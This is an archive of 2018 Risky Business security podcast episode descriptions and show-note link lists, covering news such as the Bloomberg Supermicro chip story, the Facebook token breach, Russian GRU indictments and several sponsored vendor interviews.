And that’s what’s happening today! Olabode Anise is a data scientist at Duo Security. He and his colleague Jordan Wright put together a talk for Black Hat this year all about Twitter bots. It was called “Don’t @ Me: Hunting Twitter Bots at Scale”.

As you’ll hear, finding bots on Twitter at scale isn’t that hard, but doing so with 100% confidence isn’t as easy as you’d think.

You can check out a blog post from Olabode in the show notes below.

Show notes Olabode's blog post on Twitter bots:

Risky Business #519 -- '90s IRC war between US and Russia intensifies

Oct 24, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

CYBERCOM doxing Russian operators. No, really.
Arrest over Russian midterm info-op
Bloomberg dumpster fire is now a tyre fire
Equifax insider sentenced for insider trading
Twitter releases bot dataset
Saudi insider responsible for 2015 Twitter breach
Trisis/Triton now linked to Russia
Kaspersky doxes NSA op
Risky Business cited by Senate Estimates, AA Bill faces possible delay
Much, much more!

This week’s show is sponsored by Cylance, and this week’s sponsor interview is with Josh Lemos.

That’s an interesting chat – Cylance has succeeded in applying machine learning to classifying binaries, but what next? Where does it make sense to apply machine learning next, from their point of view? As you’ll hear, a binary classifier is one thing, but applying ML to something like endpoint detection and response or network traffic is actually a lot more complicated.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
U.S. Begins First Cyberoperation Against Russia Aimed at Protecting Elections - The New York Times
Russian woman charged with attempted meddling in upcoming U.S. midterms
Apple CEO Tim Cook Is Calling For Bloomberg To Retract Its Chinese Spy Chip Story
Amazon exec joins Apple in calling for a retraction of Bloomberg’s explosive microchip spying report | Business Insider
Coats: ODNI has seen 'no evidence' of supply chain hack detailed in Bloomberg story
Super Micro trashes Bloomberg chip hack story in recent customer letter | ZDNet
Equifax engineer who designed breach portal gets 8 months of house arrest for insider trading | ZDNet
Twitter publishes dump of accounts tied to Russian, Iranian influence campaigns | Ars Technica
A Twitter employee groomed by the Saudi government prompted 2015 state-sponsored hacking warning | TechCrunch
FireEye links Russian research lab to Triton ICS malware attacks | ZDNet
Kaspersky says it detected infections with DarkPulsar, alleged NSA malware | ZDNet
Patrick ☠️SMBv1☠️ Gray on Twitter: "Risky Biz gets a shout out in senate estimates... 2018 is weird.… "
Magecart group leverages zero-days in 20 Magento extensions | ZDNet
WordPress team working on "wiping older versions from existence on the internet" | ZDNet
loses $7.5Mil worth of cryptocurrency in mysterious cold wallet hack | ZDNet
Hackers steal data of 75,000 users after FFE breach | ZDNet
Lawfare editor on persistent DDoS attack: 'We wish they'd knock it off'
Vendors confirm products affected by libssh bug as PoC code pops up on GitHub | ZDNet
Advertisers can track users across the Internet via TLS Session Resumption | ZDNet
Open source web hosting software compromised with DDoS malware | ZDNet
Legal and Constitutional Affairs Legislation Committee_2018_10_22_6688.pdf;fileType=application/pdf

I forgot to talk about this in the show... this week's sponsor guest recommends people interested in machine learning check out the papers and slide decks here: CylanceOPTICS | Products | Cylance

Risky Business #518 -- "Russian Cambridge Analytica" booted off Facebook after token hack

Oct 17, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

More info on the Facebook token hack
Facebook boots “Russian Cambridge Analytica” off platform
Chinese MSS officer extradited to USA after being lured to Belgium
NotPetya linked to Sandworm crew
Czech intelligence services kill Hezbollah APT
Pentagon travel records pwnt
No, Khashoggi’s Apple Watch didn’t record his death
Apple takes aim at Australia’s AA Bill
US voter records for sale in hack forums
PHP 5 support ends soon, netpocalypse to commence shortly afterward
The world’s most hilarious libssh bug
PLUS MOAR

This week’s show is sponsored by Senrio.

Senrio is best known for doing IoT identification, classification, visualisation and anomaly detection, but they’ve now applied the same approach to general IT. Stephen will be along later in the show to talk about what they’ve been able to engineer here. I’ve actually been working with them on this (in a limited capacity) for a few months and it’s very interesting stuff.

So yeah, he’s talking about a feature release, then he’ll be releasing some open source tooling that mines your network metadata and spots interactive shells in your environment, which is handy, and then he’s going to preview some free training he’s doing with some other very well respected security people in New York soon.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Facebook Says 14 Million People Got Their Location Data and Private Search History Stolen - Motherboard
Facebook disables accounts for Russian firm claiming to sell scraped user data - CNET
In a first, a Chinese spy is extradited to the U.S. after stealing technology secrets, Justice Dept. says - The Washington Post
Researchers link tools used in NotPetya and Ukraine grid hacks
Czech intelligence service shuts down Hezbollah hacking operation | ZDNet
Breach of Pentagon travel records exposes defense personnel PII
Why missing Saudi journalist’s Apple Watch is an interesting, but unlikely, lead | TechCrunch
Apple rebukes Australia’s “dangerously ambiguous” anti-encryption bill | TechCrunch
US voter records from 19 states sold on hacking forum | ZDNet
Ransomware hits computer networks of North Carolina water utility
Around 62 percent of all Internet sites will run an unsupported PHP version in 10 weeks | ZDNet
A mysterious grey-hat is patching people's outdated MikroTik routers | ZDNet
Sony working on a fix for bug that's crashing PlayStation 4 consoles | ZDNet
Microsoft JET vulnerability still open to attacks, despite recent patch | ZDNet
Proof-of-concept code published for Microsoft Edge remote code execution bug | ZDNet
WhatsApp fixes bug that let hackers take over app when answering a video call | ZDNet
Kanye's Password, a WhatsApp Bug, and More Security News This Week | WIRED
The ‘Donald Daters’ Trump Dating App Exposed Its Users’ Data - Motherboard
libssh 0.8.4 and 0.7.6 security and bugfix release – libssh
Senrio
Senrio Quick Product Demo on Vimeo

Risky Business #517 -- Bloomberg's dumpster fire lights up infosec

Oct 10, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Bloomberg’s shaky, disputed report on hardware back doors
A look back on other false reports about imaginary incidents published by Bloomberg
GRU operations doxed by GCHQ
DOJ charges Russian intelligence officers
APT crews targeting MSPs
Google+ API exposure the final straw
Enterprise TLS interception gear is woefully insecure

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
(9+) Turkish Pipeline Explosion Probably No Cyber Attack - Digital - Sü
The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies - Bloomberg
Codebook - October 10, 2018 - Axios
Patrick Gray on Twitter: "Just got this from Bloomberg PR.… "
Apple Bloomberg Congressional Letter
Patrick Gray on Twitter: "Holy shit… "
Report: Apple designing its own servers to avoid snooping | Ars Technica
Apple deleted server supplier after finding infected firmware in servers [Updated] | Ars Technica
New Evidence of Hacked Supermicro Hardware Found in U.S. Telecom - Bloomberg
HHM22137A2 TDK | Mouser Australia
Reckless campaign of cyber attacks by Russian military intelligence service exposed - NCSC Site
Justice Department charges 7 Russian intelligence officers
U.S. Charges Russian GRU Officers with International Hacking and Related Influence and Disinformation Operations | OPA | Department of Justice
Gordon Corera on Twitter: "Breaking - Dutch intelligence (with help of British) disrupted a Russian GRU cyber operation targeting OPCW on April 13th. Four Russian intelligence officers escorted out of country."
Advanced Persistent Threat Activity Exploiting Managed Service Providers | US-CERT
Google shuts down Google+ after API bug exposed details for over 500,000 users | ZDNet
Google Plus Will Be Shut Down After User Information Was Exposed - The New York Times
Google forcibly enables G Suite alerts for government-backed attacks | ZDNet
SandboxEscaper on Twitter: "Why did gmail just throw a notification that government attackers are trying to get into my account. Not even kidding -.-"
Google sets new rules for third-party apps to access Gmail data | ZDNet
It's 2018, and network middleware still can't handle TLS without breaking encryption | ZDNet
CEO Pleads Guilty to Selling Encrypted Phones to Organized Crime - Motherboard
Project Zero: 365 Days Later: Finding and Exploiting Safari Bugs using Publicly Available Tools
Microsoft October 2018 Patch Tuesday fixes zero-day exploited by FruityArmor APT | ZDNet
U.S. GAO - Weapon Systems Cybersecurity: DOD Just Beginning to Grapple with Scale of Vulnerabilities
Senetas, a leading provider of encryption technology

Risky Business Feature: Named source in "The Big Hack" has doubts about the story

Oct 9, 2018


In this podcast hardware security expert Joe Fitzpatrick, a named source in Bloomberg’s “Big Hack” piece, explains why he felt uncomfortable reading the story when it was published.

He also provided Risky.Biz with emails he sent to Bloomberg, prior to the story’s publication, that said the hardware back-dooring the article described “didn’t make sense”.

Show notes
The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies - Bloomberg
NSA Said to Have Used Heartbleed Bug, Exposing Consumers - Bloomberg
Mysterious ’08 Turkey Pipeline Blast Opened New Cyberwar - Bloomberg

Risky Biz Soap Box: What's up with the ZDI these days?

Oct 8, 2018


The Soap Box podcast series is a wholly sponsored podcast series we do here at Risky.Biz – vendors pay to participate. This soap box edition is brought to you by Trend Micro.

And in this edition we’re speaking with Dustin Childs, who works for the Zero Day Initiative. ZDI is the entity responsible for the Pwn2Own competition. But not just that – they’ve been buying bugs since before it was cool. Everything from enterprise software to Linux bugs... whatever. You find it, they’ll buy it.

Trend Micro actually owns the ZDI, and there’s a story right there in how that came to pass… but you know what? Trend seems to really be behind the ZDI program.

As you’ll hear, the original idea behind ZDI when it was a TippingPoint thing was so they could write IDS signatures for vulnerabilities that ZDI unearthed. We know today that spinning up sigs for bugs you’re paying for isn’t really a winning strategy for picking up 0day attempts against your computers, so, the question becomes, what do you do with a program like ZDI when you’re Trend Micro?

As it turns out, you do two things with it – there’s the marketing side, but there’s also the constant stream of exploit submissions that come in handy when you’re making endpoint security software.

We’ll also be hearing from Eric Skinner in this podcast – he’s Trend’s VP of Solution Marketing. Trend is pushing a major release of its endpoint security software and he’s along to spruik that a bit, as well as chiming in on some of the ZDI stuff.

Show notes
Zero Day Initiative | Home
Endpoint Sensor | Endpoint Detection and Response (EDR) | Trend Micro

[CORRECTED] Risky Business feature: A podcast on Bloomberg's absolutely wild Supermicro story

Oct 5, 2018


In this podcast I interview Stephen Ridley about Bloomberg’s blockbuster – but so far uncorroborated – story about possible hardware supply chain subversion by the Chinese government.

I also lay out some facts I’ve learned since the story broke.

[CORRECTED] I’ve added a correction to this podcast because the only source I could turn up who would corroborate the Bloomberg piece has retracted their claims.

This is a source who has provided me with good information in the past; I’ve known them for about 15 years and they’re very well plugged in. They showed me photos they said were from a teardown of a Supermicro motherboard. These photos showed an unlabelled integrated circuit the source said was likely a hardware back door.

Further, the source said there were other problems with the Supermicro gear, including vulnerable firmware and security functions that just didn’t work properly.

Now the source says the photos were from different equipment, not their teardown of the Supermicro gear, and that they did not find hardware back doors on the Supermicro equipment.

So basically that source’s credibility with me is pretty shot right now, and the best I can do is retract my repetition of the source’s claim that they had verified backdoors in the Supermicro equipment.

Show notes
The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies - Bloomberg

Risky Business #516 -- The Facebook breach, e2e VOIP court verdict, Uber's record fine and more

Oct 3, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Facebook breach impacts 50m accounts
US courts deny authorities’ attempted FB Messenger wiretap
Uber fined $148m for nondisclosure of 2016 breach
Fancy Bear-linked UEFI malware appears in wild
UK Conservative party conference app leaks like sieve
Twitter bans distribution of “hacked material”
VPNFilter botnet gets more capabilities
Duo arrested over $14m cryptocurrency SIM-swap heist
MOAR

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
50 million Facebook accounts breached by access-token-harvesting attack | Ars Technica
Facebook says it detected security breach after traffic spike | ZDNet
Facebook sued hours after announcing security breach | ZDNet
Facebook finds ‘no evidence’ hackers accessed connected apps | TechCrunch
Exclusive: In test case, U.S. fails to force Facebook to wiretap Messenger calls - sources | Reuters
Uber to pay $148 million to states for 2016 data breach - CyberScoop
First UEFI malware discovered in wild is laptop security software hijacked by Russians | Ars Technica
Report: Zoho's domain regularly exploited to move keylogger data
UK Conservative Party conference app leaks MPs' personal details | ZDNet
Twitter bans distribution of hacked materials ahead of US midterm elections | ZDNet
Talos Blog || Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: VPNFilter III: More Tools for the Swiss Army Knife of Malware
Gigantic 100,000-strong botnet used to hijack traffic meant for Brazilian banks | ZDNet
2 men arrested in Oklahoma, suspected in $14 million cryptocurrency theft, hacking of California company |
Hackers Are Holding High Profile Instagram Accounts Hostage - Motherboard
Feds Force Suspect To Unlock An Apple iPhone X With Their Face
U.S. looks to restart talks on global cyber norms
Canadian restaurant chain suffers country-wide outage after malware outbreak | ZDNet
Port of San Diego suffers cyber-attack, second port in a week after Barcelona | ZDNet
Some Apple laptops shipped with Intel chips in "manufacturing mode" | ZDNet
Google to no longer allow Chrome extensions that use obfuscated code | ZDNet
Phishing campaign targets developers of Chrome extensions | ZDNet
US sentences to prison its first ATM jackpotter | ZDNet
FBI solves mystery surrounding 15-year-old Fruitfly Mac malware | ZDNet
Hackers Can Stealthily Avoid Traps Set to Defend Amazon's Cloud | WIRED
Alphabet launches VirusTotal Enterprise | ZDNet
Researchers find vulnerability in Apple's MDM DEP process | ZDNet
HD Moore on Twitter: "Estimate how old a device is based on it's MAC address with mac-ages.csv: (a huge thanks to @jedimercer for…"
Adobe Releases Security Updates for Acrobat that Fix 86 Vulnerabilities
Security Update for Foxit PDF Reader Fixes 118 Vulnerabilities
(PDF) Weaponizing the haters: The Last Jedi and the strategic politicization of pop culture through social media manipulation.
Gigamon Insight | Gigamon

Risky Business #515 -- NSA staffer at centre of Kaspersky scandal jailed

Sep 26, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Former NSA staffer gets 66 months over incident at heart of Kaspersky scandal
Zoho has a very bad week
Telco lobby group raises some legit concerns over Australia’s “anti-encryption” legislation
Twitter API leaks DMs
Equifax fined by UK
Yubikey 5 enables passwordless Windows logins
Privacy International has an aneurysm
NSS Labs launches antitrust suit against security software makers
MOAR

This week’s show is brought to you by Rapid7.

Jen Andre is this week’s sponsor guest. She was the founder of Komand, a security automation and orchestration company that became part of Rapid7 around midway through last year. I spoke to Jen a bit about how she came to start Komand and where the security automation and orchestration discipline is at right now.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Ex-NSA employee gets 5.5 years in prison for taking home classified info | ZDNet
EDITORIAL-EAST-20180920122519
Domain registrar oversteps taking down Zoho domain, impacts over 30Mil users | ZDNet
Peter Dutton to push through new security legislation as fears of "severely damaging" spyware murmur
Twitter API bug leaked private data to other accounts
Equifax fined maximum penalty under 1998 UK data protection law
The Series 5 YubiKey Will Help Kill the Password | WIRED
Press release: UK intelligence agency admits unlawfully spying on Privacy International | Privacy International
UK spooks fess up to snooping on Privacy International's private data
GCHQ's mass surveillance violates citizens' right to privacy, ECHR rules
NSS Labs files antitrust suit against multiple cybersecurity vendors
Hacking for ca$h | The Strategist
Operator of 'VirusTotal for criminals' gets 14-year prison sentence
Tencent engineer attending cybersecurity event fined for hotel WiFi hacking
Snyk gets $22 million for platform that tracks security flaws in open source projects
They Got 'Everything': Inside a Demo of NSO Group's Powerful iPhone Malware - Motherboard
Content Moderator Sues Facebook, Says Job Gave Her PTSD - Motherboard
Microsoft Rolls Out Confidential Computing for Azure
Cloudflare Improves Privacy by Encrypting the SNI During TLS Negotiation
This Windows file may be secretly hoarding your passwords and emails | ZDNet
Security researcher claims macOS Mojave privacy bug on launch day | TechCrunch
0Day Windows JET Database Vulnerability disclosed by Zero Day Initiative
Over 80 Cisco Products Affected by FragmentSmack DoS Bug
Cisco patches 'critical' credential bug in video surveillance software
Security Orchestration and Automation with InsightConnect | Rapid7
Security Orchestration and Automation for Security Operations | Rapid7

Risky Biz Soap Box: Yubico launches Yubikey 5, ushers in passwordless Windows logins

Sep 24, 2018


Soap Box is the wholly sponsored podcast series we do where vendors pay to participate.

Our guest in this edition is Jerrod Chong, the SVP of product at Yubico, the makers of Yubikeys. We were originally going to publish this Soap Box with Yubico a few weeks ago, but we delayed it for a very good reason.

This podcast is going out at the same time as a press release from Yubico – they’re releasing the Yubikey 5, and it’s a very significant update.

Regular listeners would have heard me talk about seeing Yubico’s booth at Black Hat – it was like a mosh pit, and I think there are two reasons for that. Firstly, they were giving away keys (haha), but secondly, they were demonstrating FIDO2 Windows logins over NFC.

With the launch of the Yubikey 5, Yubico has actually delivered passwordless logins for Windows networks. You can do tap only via NFC, tap and pin via NFC, or you can roll old school with USB.

So, Jerrod Chong joined me for this conversation. We talk about the Yubikey 5, and more broadly about the future of authentication and authentication devices.

Show notes
Introducing the YubiKey 5 Series with New NFC and FIDO2 Passwordless Features | Yubico
Yubico Lightning Project | Yubico

Risky Business feature: iOS exploits just got a lot more expensive

Sep 21, 2018


We’re going to be talking to two people in this podcast and the topic is, for the most part, the introduction of pointer authentication on the latest Apple iPhones. This is a development that flew under the radar of most of the infosec media and it’s significant because it is going to basically wipe out ROP exploits as we know them. There’s no such thing as a perfect mitigation, but Apple has leveraged some recent ARM features to really lock down their devices.

In addition to the pointer authentication stuff, they’ve also made some changes that will affect the ability of companies like Cellebrite to unlock phones. Again, this won’t kill unlocks completely, but in one release Apple really has made life a lot harder for people in the offence game.

This will eventually have some consequences for the crypto debate. These devices are just getting more and more secure through some really cool engineering.

So we’ll be talking to Chris Wade about this; he’s the brain behind Corellium, an iOS emulator. His clients include everyone from exploit developers to the publishers of very popular iOS applications. If you want to back-test an app change on 15 different versions of iOS, Corellium is the way to do that… or if you want to, you know, test your latest 0day, it’s good for that, too.

Then we’re going to hear from Dr. Silvio Cesare of Infosect here in Oz. He’s going to talk about whether we might see similar mitigations on Intel and weigh in on Apple’s changes.

Show notes
Apple iOS Security Guide

Risky Business #514 -- New NSO Group report released and another State Department email breach. Drink!

Sep 19, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Citizen Lab drops NSO Group report
“Weaponised Stuxnet” claims are idiotic
Another State Department email breach! Drink!
Dutch foil planned attack against Swiss Novichok lab
Mirai botnet authors working for FBI
US telcos want to be consumer auth brokers
US fails to extradite “Mr Bitcoin”
Much, much more

This week’s show is brought to you by Remediant. They make a just-in-time access solution for privileged account management (PAM), and we’re doing something a little different in this week’s sponsor interview.

Paul Lanzi of Remediant will be along, but so will Harry Perper of MITRE corporation. Harry’s pay-cheques say MITRE, but he’s been working on a NIST project. The National Cybersecurity Center of Excellence (NCCoE) at NIST has been working on a project to provide guidance on the secure usage and management of privileged accounts. The so-called 1800-18 document is a practical guide and reference architecture for privileged account management and we’ll talk to both Harry and Paul about that after the news.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Cyber Sleuths Find Traces of Infamous iPhone and Android Spyware ‘Pegasus’ in 45 Countries - Motherboard
HIDE AND SEEK: Tracking NSO Group’s Pegasus Spyware to Operations in 45 Countries - The Citizen Lab
iOS Security Guide iOS 12 September 2018
US military given more authority to launch preventative cyberattacks - CNNPolitics
People Are Recklessly Speculating That the Massachusetts Gas Explosions Were a Stuxnet-Related Hack - Motherboard
State Department email breach exposed employees' personal information - POLITICO
Novichok poisoning: Russians expelled from Switzerland
The Mirai Botnet Architects Are Now Fighting Crime With the FBI | WIRED
U.S. Mobile Giants Want to be Your Online Identity — Krebs on Security
Senior Google Scientist Resigns Over “Forfeiture of Our Values” in China
Google Plans to Launch Censored Search Engine in China, Leaked Documents Reveal
Google's prototype Chinese search engine links searches to phone numbers | Technology | The Guardian
Vijay Boyapati on Twitter: "When I worked at Google, as an engineer on Google News, I was asked to write code to censor news articles in China (circa 2006). I refused and they took me off the project and put someone else on it. Doesn't surprise me Google is back at it. "Don't be Evil" is a Google myth.…"
US loses extradition battle with Russia for Bitcoin kingpin | ZDNet
US lawmakers introduce bill to fight cybersecurity workforce shortage | ZDNet
Ransomware attack blacks out screens at Bristol Airport | ZDNet
Security flaw can leak Intel ME encryption keys | ZDNet
Nasty piece of CSS code crashes and restarts iPhones | ZDNet
New cold boot attack affects 'nearly all modern computers' | ZDNet
Uproar after Adobe winds down Magento rewards-based bug bounty program | ZDNet
Jason Woosley on Twitter: "The demise of #BugBounty at @Magento has been greatly exaggerated. Yesterday we announced the transition of this program to the @Adobe @HackerOne system. We failed to mention that we will continue to pay out for this incredibly valuable work. Hack on!"
Proofpoint: One month out from deadline, half of agency domains are DMARC compliant
Cloudflare’s new ‘one-click’ DNSSEC setup will make it far more difficult to spoof websites | TechCrunch
Facebook pilots new political campaign security tools — just 50 days before Election Day | TechCrunch
Facebook Broadens Its Bug Bounty to Include Third-Party Apps | WIRED
Google remotely changed the settings on a bunch of phones running Android 9 Pie - The Verge
Zero day in popular video surveillance technology goes public, unpatched
Privileged Account Management | NCCoE
fs-pam-project-description-draft.pdf

Risky Business #513 -- The DPRK indictment, BA gets owned, Webauthn issues and more [CORRECTED]

Sep 12, 2018



This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

The DPRK indictment and subsequent fallout
British Airways gets owned
Webauthn hits some roadblocks
The latest action from Washington DC
Trend Micro has a bad time
Tesla pays out for key-fob clone attack
Tor browser 0day hits Twitter
Much, much more

We’ve got a great sponsor interview for you this week – we’ll be joined by Haroon Meer of Thinkst Canary. They did something unusual over the last couple of weeks – they removed a feature in their Canary product. We’ll be talking about that, and also about the tendency for security software to be too complicated and configurable.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.


The original release of this podcast included discussion of some rumours that turned out to amount to nothing. We had mentioned three data points:

The CISO of American Airlines, Dan Glass, departing a few weeks ago
Someone I know had their AA/Citi credit card re-issued, despite saying they only ever used that card to buy AA fares
A rumour an FBI computer crime investigator is on site at American Airlines

Well, it turns out Dan Glass is a listener, and he got in touch with us after the podcast ran to clear this up. He says the reason he left is actually because AA was offering some very attractive redundancy packages. Following AA’s merger with US Airways, the combined group eventually found itself in the position of having too many executives. As many listeners will know, being a CISO is a pretty hardcore job, so Dan jumped at the chance to bounce out and have some time off.

As for the FBI being on-site, Dan says that’s not unusual. They’re one of the largest airlines in the world so they’re frequently liaising with LE. As for my pal’s card getting re-issued… who knows?

The point is it looks like these rumours and data points don’t actually add up to much. This is why I rarely run rumour in the podcast and at least try to do some verification. In this case I just didn’t have time, but still, I should have just held it over until I’d had a chance to make some basic enquiries. It was sloppy. Sorry.

In particular I’d like to apologise to the fraud teams who may have been asked to follow this up, the PR teams who’ve no doubt been fielding questions about this and also to Dan Glass. Although, it must be said Dan and I had a very nice chat and he didn’t seem upset. Thanks for being a chiller, Dan!

Again, I’m sorry. I’ll do better in the future.


Show notes
U.S. charges North Korean hacker over Sony, WannaCry incidents
US indicts North Korean agent for WannaCry, Sony attacks [Updated] | Ars Technica
Analysts expect Lazarus Group to evolve, clean up opsec
Don't Punish A North Korean Hacker Just For Following Orders
The North Korean Hacker Charges: Line-Drawing as a Necessary but not Sufficient Part of Deterrence - Lawfare
British Airways breach caused by the same group that hit Ticketmaster | ZDNet
Card-Skimming Malware Campaign Hits Dozens of Sites Daily
Worries arise about security of new WebAuthn protocol | ZDNet
A call for principle-based international agreements to govern law enforcement access to data - Microsoft on the Issues
Exclusive: Trump to target foreign meddling in U.S. elections with sanctions order - sources | Reuters
House passes deterrence bill that would call out nation-state hackers
First IoT security bill reaches governor's desk in California | ZDNet
DHS supply chain and CDM bills pass the House
Former Facebook security chief Alex Stamos: Being a CSO can be a ‘crappy job’ | TechCrunch
Alex Stamos: Pretty clear GRU's goal was to weaken a future Clinton presidency | ZDNet
'We simply haven't done enough': Facebook and Twitter execs testify on foreign influence campaigns
Trend Micro blames data collection issue on code library re-use
Apple Removes Top Security App For Stealing Data and Sending it to China
Tesla offers 'goodwill' to security researchers hacking its cars
Hackers Can Steal a Tesla Model S in Seconds by Cloning Its Key Fob | WIRED
U.S. extradites Russian accused in hack of JPMorgan Chase
Standard to protect against BGP hijack attacks gets first official draft | ZDNet
Exploit Affecting Tor Browser Burned In A Tweet
Exploit vendor drops Tor Browser zero-day on Twitter | ZDNet
Tor launches official anonymous Android browser
US government releases post-mortem report on Equifax hack | ZDNet
GAO-18-559, DATA PROTECTION: Actions Taken by Equifax and Federal Agencies in Response to the 2017 Breach
Thinkst Canary on Twitter: "This week we totally announced an un-feature. We are removing SNMP as an available service on Canaries. (Turns out its signal to noise ratio is terribad, and everyone we’ve ever caught through SNMP also tripped over other services too)…"

Snake Oilers 7 part 2: launch, InQuest and Aiculus

Sep 6, 2018


On this edition of Snake Oilers we hear from three companies, and for one of them, it’s actually their product launch!

Assetnote is a cloud asset discovery and security scanning platform spun out of the bug bounty community. If you’re a CSO with any large public attack surface you’ll really want to hear about that one. This platform finds things you didn’t even know your company had online in cloud environments and then scans them for real, actual RCEs. The user interface is awesome, too.

Then we’re going to hear from Pedram Amini of InQuest – they make a box that reassembles files from network packets captured off the wire or funnelled in through ICAP and then rips them to bits looking for badness. They call it deep file inspection and it’s a great way to supplement client side detection, at scale. You can even pass these reassembled files on to multi-AV or cloud services and use this platform to do spot threat hunting. It’s very powerful stuff, and honestly that’s an interview that got me thinking in a new way about detection concepts.

And then finally we’re joined by Omaru Maruatona of Aiculus. Omaru has a PhD in applying machine learning to bank fraud, which he obtained while working for one of the big four banks here in Australia. After that he moved on to PwC as a penetration tester, and now he’s running Aiculus. Aiculus has developed an API proxy that uses machine learning to detect funky calls. If you’re not satisfied that your API gateway has you completely covered then yeah, you’ll want to listen to that one.

Show notes
Assetnote - Continuous Security Across Your External Attack Surface
InQuest - Prevent attacks. Detect breaches. Hunt for threats.
Aiculus

Risky Business #512 -- Five Eyes nations send clear message on encryption

Sep 5, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Five Eyes nations send a clear message on encryption
Massive Azure outage
FBI releases political campaign security guidance
Google wants to kill the URL
Plugin owned sideways
Final “Celebgate” hacker sentenced
Google launches font fuzzing tool
Chinese-made Google/Feitian U2F keys under scrutiny
Some interesting TPM research
MUCH MORE

This week’s podcast is brought to you by AttackIQ.

AttackIQ founder Stephan Chenette will be along in this week’s sponsor interview to talk to us about a few things – the MITRE ATT&CK matrix being one. He’ll also share with us his view that EDR is the most commonly misconfigured security technology he sees out there, and he has pretty good visibility into things like that because AttackIQ, of course, makes attack simulation software designed to measure the efficacy of these types of solutions.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Five Eyes’ data access warning - Patrick Gray on Twitter: "Five Eyes officially warns the tech world: build interception capabilities voluntarily or we’ll legislate.…"
Statement of Principles on Access to Evidence and Encryption
Azure status
FBI to political campaigns: Up your 'cyber hygiene' - ABC News
Protected Voices — FBI
Google Wants to Kill the URL | WIRED
Chrome extension caught stealing passwords, cryptocurrency private keys | ZDNet
Germany launches new cybersecurity research agency modeled after DARPA
Fourth man receives prison sentence in 'Celebgate' photo leak
Google open-sources internal tool for finding font-related security bugs | ZDNet
Experts Call for Transparency Around Google’s Chinese-Made Security Keys - Motherboard
Google Notifies People Targeted by Secret FBI Investigation - Motherboard
Public IP Addresses of Tor Sites Exposed via SSL Certificates
Temporary Patch Available for Recent Windows Task Scheduler ALPC Zero-Day
Researchers Detail Two New Attacks on TPM Chips
New Hakai IoT botnet takes aim at D-Link, Huawei, and Realtek routers | ZDNet
Two Birds, One STONE PANDA
Xipiter/Senrio exploitation training
MITRE ATT&CK Module

Risky Business feature interview: Linux malware is booming, thanks to IoT

Aug 31, 2018


The widespread adoption of smart and IoT devices – everything from drones and security cameras to thermostats and routers – means the developers of non-Windows-based malware have been pretty busy lately.

In fact, there’s been an almost tenfold increase in the volume of these (ELF) samples submitted to Virus Total over the past two years. That’s according to a cohort of researchers from the Software and System Security group at French graduate school EURECOM, who set out in 2016 to develop an empirical study of non-Windows malware.

They downloaded hundreds of daily candidate samples from Virus Total for a year, resulting in a dataset of more than 10,000 binaries and a tool called Padawan, an automated framework for dynamic analysis of non-Windows malware.

The researchers presented findings earlier this year at the IEEE Symposium on Security and Privacy, and more recently at reverse engineering conference RECon in Montreal. Risky Business contributor Hilary Louise recently caught up over the phone with France-based EURECOM doctoral student Emanuele Cozzi who says the land of Linux-type malware analysis is a bit of a nascent field.

Show notes
oakland18_cozzi.pdf
Padawan live

Risky Business #511 -- Australia, Japan to ban Huawei, Struts drama, DNC lols and more

Aug 29, 2018


We’re going to stick with the revised format this week – we’re going long on news with Adam, then diving right into the sponsor interview with Zane Lackey of Signal Sciences.

A bunch of you heard my long-form Soap Box interview with Zane from a few weeks back. We’re extending that interview out a bit in this week’s show. Zane will be outlining what he thinks needs to change in DevSecOps tooling and workflow for things to really work nicely – that interview is a solid 12 minutes of good thinking and advice, so do stick around for it.

Adam Boileau will join the show to recap the week’s news:

Australia and Japan to ban Huawei from their 5G builds
Struts bug: Big deal or meh?
Voting machine maker ES&S rebuked by researchers AND US gov
The DNC phish that wasn’t
Recapping Andy Greenberg’s Maersk/NotPetya coverage
Instagram adds real 2FA
Windows privesc 0day on teh twittarz
T-Mobile pwned harder than it initially admitted
Log in to Windows with Google accounts
Some hilarious Lazarus group shenanigans
Much, much more

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
China intensifies criticism of Australia's Huawei 5G ban |
Japan plans to block Huawei, ZTE from public procurement: report
New critical vulnerability exposes Apache Struts instances to remote attacks
Active Attacks Detected Using Apache Struts Vulnerability CVE-2018-11776
Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776 - Palo Alto Networks Blog
The Cybersecurity 202: Lawmakers dismiss voting machine maker's claim that spies benefit from election hacking demos - The Washington Post
Rob Joyce on Twitter: "Ignorance of insecurity does not get you security. We need to examine voting machines, SCADA systems, IOT and other important items in our lives. The investigation of these devices by the hacker community is a service, not a threat."
How the U.S. Has Failed to Protect the 2018 Election—and Four Ways to Protect 2020 - Lawfare
Democrats find hackers targeting voter database
DNC says phishing incident was a false alarm
Facebook bans Myanmar general as U.N. calls for independent investigation into Rohingya crisis
